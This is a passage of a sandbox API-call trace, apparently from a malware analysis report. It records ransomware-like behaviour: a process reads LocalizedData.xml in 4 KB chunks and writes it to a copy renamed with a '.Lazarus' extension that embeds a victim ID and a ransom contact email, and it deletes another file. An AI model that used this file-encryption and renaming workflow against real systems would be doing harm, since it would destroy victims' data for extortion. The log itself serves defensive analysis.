| out: hHeap=0x20000) returned 1 [0068.244] GetLastError () returned 0x0 [0068.244] SetLastError (dwErrCode=0x0) [0068.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0068.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0068.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5b8 | out: hHeap=0x20000) returned 1 [0068.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0068.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0068.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0068.244] CloseHandle (hObject=0x420) returned 1 [0068.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0068.245] CloseHandle (hObject=0x410) returned 1 [0068.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0068.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0068.246] AreFileApisANSI () returned 1 [0068.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0068.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0068.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 36 [0068.246] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0068.247] GetFileType (hFile=0x410) returned 0x1 [0068.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0068.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0068.247] GetLastError () returned 0xb7 [0068.247] SetLastError (dwErrCode=0xb7) [0068.247] WriteFile (in: hFile=0x410, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0068.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0068.248] CloseHandle (hObject=0x410) returned 1 [0068.249] AreFileApisANSI () returned 1 [0068.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0068.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69440 [0068.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x69440, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 36 [0068.249] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf")) returned 1 [0068.250] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69440 | out: hHeap=0x20000) returned 1 [0068.250] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0068.250] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0068.250] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0068.250] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0068.250] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0068.250] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0068.250] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0068.250] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d798 | out: hHeap=0x20000) returned 1 [0068.250] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6a8 | out: hHeap=0x20000) returned 1 [0068.250] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0068.250] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8be28 | out: hHeap=0x20000) returned 1 [0068.250] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0068.250] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0068.250] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0068.250] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0068.250] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0068.250] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0068.250] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.250] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.250] FindNextFileW (in: hFindFile=0x781d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xfed6, dwReserved0=0x1, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0068.250] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0068.250] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0068.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0068.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0068.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0068.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0068.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0068.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0068.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0068.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0068.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0068.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0068.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0068.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0068.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0068.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0068.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0068.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0068.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0068.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0068.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0068.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0068.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0068.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0068.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0068.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0068.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0068.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0068.251] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.251] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.251] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.251] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0068.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0068.251] AreFileApisANSI () returned 1 [0068.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0068.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0068.251] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.252] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0068.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0068.252] AreFileApisANSI () returned 1 [0068.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0068.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71a98 [0068.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x71a98, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 45 [0068.252] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0068.252] GetFileType (hFile=0x410) returned 0x1 [0068.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0068.252] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0068.252] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0068.253] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0068.253] CloseHandle (hObject=0x410) returned 1 [0068.253] AreFileApisANSI () returned 1 [0068.253] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0068.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71960 [0068.253] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 45 [0068.253] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0068.253] GetFileType (hFile=0x410) returned 0x1 [0068.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0068.253] CloseHandle (hObject=0x410) returned 1 [0068.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0068.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0068.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0068.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0068.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0068.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0068.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0068.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0068.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0068.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0068.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0068.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0068.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0068.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0068.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0068.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0068.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0068.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0068.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0068.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0068.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0068.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0068.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0068.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0068.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0068.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0068.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0068.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0068.254] AreFileApisANSI () returned 1 [0068.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0068.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71960 [0068.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 45 [0068.254] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xfed6)) returned 1 [0068.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0068.254] AreFileApisANSI () returned 1 [0068.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0068.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0068.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0068.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0068.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0068.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0068.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0068.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0068.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0068.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0068.255] GetLastError () returned 0x0 [0068.255] SetLastError (dwErrCode=0x0) [0068.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4de70 [0068.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x8c430 [0068.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b680 [0068.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d690 [0068.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d540 [0068.255] GetLastError () returned 0x0 [0068.255] SetLastError (dwErrCode=0x0) [0068.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0068.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0068.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x719c8 [0068.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0068.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x5e570 [0068.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0068.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0068.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0068.255] AreFileApisANSI () returned 1 [0068.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 107 [0068.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x51398 [0068.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=107 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 107 [0068.256] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0068.256] GetFileType (hFile=0x410) returned 0x1 [0068.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0068.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0068.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0068.256] AreFileApisANSI () returned 1 [0068.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0068.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71758 [0068.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 45 [0068.256] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0068.257] GetFileType (hFile=0x420) returned 0x1 [0068.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0068.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0068.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0068.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0068.257] GetLastError () returned 0x0 [0068.257] SetLastError (dwErrCode=0x0) [0068.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0068.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0068.257] GetLastError () returned 0x0 [0068.257] SetLastError (dwErrCode=0x0) [0068.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0068.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0068.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0068.257] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0068.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0068.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0068.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x85fc0 [0068.259] GetLastError () returned 0x0 [0068.259] SetLastError (dwErrCode=0x0) [0068.259] GetLastError () returned 0x0 [0068.259] SetLastError (dwErrCode=0x0) [0068.260] GetLastError () returned 0x0 [0068.260] SetLastError (dwErrCode=0x0) [0068.260] GetLastError () returned 0x0 [0068.260] SetLastError (dwErrCode=0x0) [0068.260] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0068.260] WriteFile (in: hFile=0x410, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0068.261] GetLastError () returned 0x0 [0068.261] SetLastError (dwErrCode=0x0) [0068.262] GetLastError () returned 0x0 [0068.262] SetLastError (dwErrCode=0x0) [0068.262] GetLastError () returned 0x0 [0068.262] SetLastError (dwErrCode=0x0) [0068.262] GetLastError () returned 0x0 [0068.262] SetLastError (dwErrCode=0x0) [0068.262] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0068.262] WriteFile (in: hFile=0x410, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0068.262] GetLastError () returned 0x0 [0068.262] SetLastError (dwErrCode=0x0) [0068.262] GetLastError () returned 0x0 [0068.262] SetLastError (dwErrCode=0x0) [0068.263] GetLastError () 